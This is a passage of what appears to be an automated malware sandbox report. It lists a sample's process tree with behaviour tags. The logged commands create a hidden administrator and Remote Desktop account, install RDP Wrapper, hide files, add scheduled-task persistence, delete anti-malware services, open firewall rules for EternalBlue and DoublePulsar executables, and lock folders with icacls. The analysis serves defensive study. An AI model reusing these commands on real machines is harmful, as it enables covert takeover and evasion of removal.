        net localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" "John" /add
        10⤵
        
        PID:5808
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "└Σ∞ΦφΦ±≥≡α≥ε≡√" "John" /add
        11⤵
        
        PID:5952
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administratorzy" "John" /add
        10⤵
        
        PID:4764
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:2736
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administrators" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4340
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administrators" John /add
        11⤵
        
        PID:5828
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Administradores" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3136
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Administradores" John /add
        11⤵
        
        PID:5048
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add
        10⤵
        
        PID:1164
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≡αßε≈σπε ±≥εδα" John /add
        11⤵
        
        PID:2544
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add
        10⤵
        
        PID:4712
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "╧εδⁿτεΓα≥σδΦ ≤Σαδσφφεπε ≤∩≡αΓδσφΦ " John /add
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5188
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Remote Desktop Users" John /add
        10⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:5284
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
        11⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:2396
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Usuarios de escritorio remoto" John /add
        10⤵
        
        PID:1400
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
        11⤵
        
        PID:5172
        
        C:\Windows\SysWOW64\net.exe
        
        net localgroup "Uzytkownicy pulpitu zdalnego" John /add
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2204
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
        11⤵
        
        PID:916
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -i -o
        10⤵
        Executes dropped EXE
        
        PID:5268
        
        C:\rdp\RDPWInst.exe
        
        "RDPWInst.exe" -w
        10⤵
        Executes dropped EXE
        
        PID:1588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
        10⤵
        Hide Artifacts: Hidden Users
        
        PID:4900
        
        C:\Windows\SysWOW64\net.exe
        
        net accounts /maxpwage:unlimited
        10⤵
        
        PID:4656
        
        C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /maxpwage:unlimited
        11⤵
        System Location Discovery: System Language Discovery
        
        PID:5384
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:412
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\Program Files\RDP Wrapper"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4456
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib +s +h "C:\rdp"
        10⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2372
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 2
        8⤵
        Delays execution with timeout.exe
        
        PID:4052
    - - C:\ProgramData\Microsoft\Intel\winlog.exe
        
        C:\ProgramData\Microsoft\Intel\winlog.exe -p123
        5⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4340
      - C:\ProgramData\Microsoft\Intel\winlogon.exe
        
        "C:\ProgramData\Microsoft\Intel\winlogon.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:224
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\65DD.tmp\65DE.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"
        7⤵
        
        PID:2784
    - - C:\Programdata\RealtekHD\taskhostw.exe
        
        C:\Programdata\RealtekHD\taskhostw.exe
        5⤵
        Executes dropped EXE
        
        PID:3500
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1904
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1620
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
        5⤵
        Drops file in Drivers directory
        
        PID:5036
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat
        5⤵
        
        PID:1624
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 5 /NOBREAK
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4920
      - C:\Windows\SysWOW64\timeout.exe
        
        TIMEOUT /T 3 /NOBREAK
        6⤵
        Delays execution with timeout.exe
        
        PID:2956
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM 1.exe /T /F
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\SysWOW64\taskkill.exe
        
        TASKKILL /IM P.exe /T /F
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5212
      - C:\Windows\SysWOW64\attrib.exe
        
        ATTRIB +H +S C:\Programdata\Windows
        6⤵
        Views/modifies file attributes
        
        PID:5108
- - C:\programdata\install\ink.exe
    C:\programdata\install\ink.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appidsvc
    3⤵
    PID:5920
  - - C:\Windows\SysWOW64\sc.exe
      sc start appidsvc
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:3348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc start appmgmt
    3⤵
    PID:5328
  - - C:\Windows\SysWOW64\sc.exe
      sc start appmgmt
      4⤵
      Launches sc.exe
      PID:2564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
    3⤵
    PID:5112
  - - C:\Windows\SysWOW64\sc.exe
      sc config appidsvc start= auto
      4⤵
      Launches sc.exe
      PID:4544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
    3⤵
    - System Location Discovery: System Language Discovery
    PID:432
  - - C:\Windows\SysWOW64\sc.exe
      sc config appmgmt start= auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:5096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete swprv
    3⤵
    PID:456
  - - C:\Windows\SysWOW64\sc.exe
      sc delete swprv
      4⤵
      Launches sc.exe
      PID:180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop mbamservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3144
  - - C:\Windows\SysWOW64\sc.exe
      sc stop mbamservice
      4⤵
      Launches sc.exe
      PID:1576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5404
  - - C:\Windows\SysWOW64\sc.exe
      sc stop bytefenceservice
      4⤵
      Launches sc.exe
      PID:1088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
    3⤵
    PID:5772
  - - C:\Windows\SysWOW64\sc.exe
      sc delete bytefenceservice
      4⤵
      Launches sc.exe
      PID:1196
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete mbamservice
    3⤵
    PID:4148
  - - C:\Windows\SysWOW64\sc.exe
      sc delete mbamservice
      4⤵
      Launches sc.exe
      PID:1044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete crmsvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3304
  - - C:\Windows\SysWOW64\sc.exe
      sc delete crmsvc
      4⤵
      Launches sc.exe
      PID:4392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete "windows node"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:916
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "windows node"
      4⤵
      Launches sc.exe
      PID:5496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer
    3⤵
    PID:3788
  - - C:\Windows\SysWOW64\sc.exe
      sc stop Adobeflashplayer
      4⤵
      Launches sc.exe
      PID:4648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3036
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AdobeFlashPlayer
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:4292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MoonTitle
    3⤵
    PID:1420
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MoonTitle
      4⤵
      Launches sc.exe
      PID:848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MoonTitle"
    3⤵
    PID:5704
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MoonTitle"
      4⤵
      Launches sc.exe
      PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop AudioServer
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\sc.exe
      sc stop AudioServer
      4⤵
      Launches sc.exe
      PID:4320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete AudioServer"
    3⤵
    PID:5916
  - - C:\Windows\SysWOW64\sc.exe
      sc delete AudioServer"
      4⤵
      Launches sc.exe
      PID:5544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_64
    3⤵
    PID:716
  - - C:\Windows\SysWOW64\sc.exe
      sc stop clr_optimization_v4.0.30318_64
      4⤵
      Launches sc.exe
      PID:5208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:976
  - - C:\Windows\SysWOW64\sc.exe
      sc delete clr_optimization_v4.0.30318_64"
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:5796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql
    3⤵
    PID:5268
  - - C:\Windows\SysWOW64\sc.exe
      sc stop MicrosoftMysql
      4⤵
      Launches sc.exe
      PID:1244
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql
    3⤵
    PID:216
  - - C:\Windows\SysWOW64\sc.exe
      sc delete MicrosoftMysql
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:5404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
    3⤵
    PID:1456
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall set allprofiles state on
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5004
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
    3⤵
    PID:468
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
    3⤵
    PID:2848
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
    3⤵
    PID:6120
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
    3⤵
    PID:2372
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5892
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:3984
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:5720
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    PID:2972
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:3616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
    3⤵
    PID:5280
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1592
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
    3⤵
    PID:5648
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
    3⤵
    PID:3768
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5560
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
    3⤵
    PID:5204
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
    3⤵
    PID:4052
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:2804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6032
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:2696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
    3⤵
    PID:2676
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
    3⤵
    PID:4500
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
    3⤵
    PID:4544
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:5412
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4532
  - - C:\Windows\SysWOW64\netsh.exe
      netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:1420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:4488
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
    3⤵
    PID:4996
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3360
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:3768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
    3⤵
    PID:3904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:5048
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3728
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
    3⤵
    PID:5284
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:5976
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3764
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
    3⤵
    PID:3372
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3812
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:972
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
    3⤵
    PID:4888
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:976
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:3624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1904
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2804
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:2088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
    3⤵
    PID:4624
  - - C:\Windows\SysWOW64\icacls.exe
      icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      System Location Discovery: System Language Discovery
      PID:4852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
    3⤵
    PID:2096
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
    3⤵
    PID:2680
  - - C:\Windows\SysWOW64\icacls.exe
      icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
      4⤵
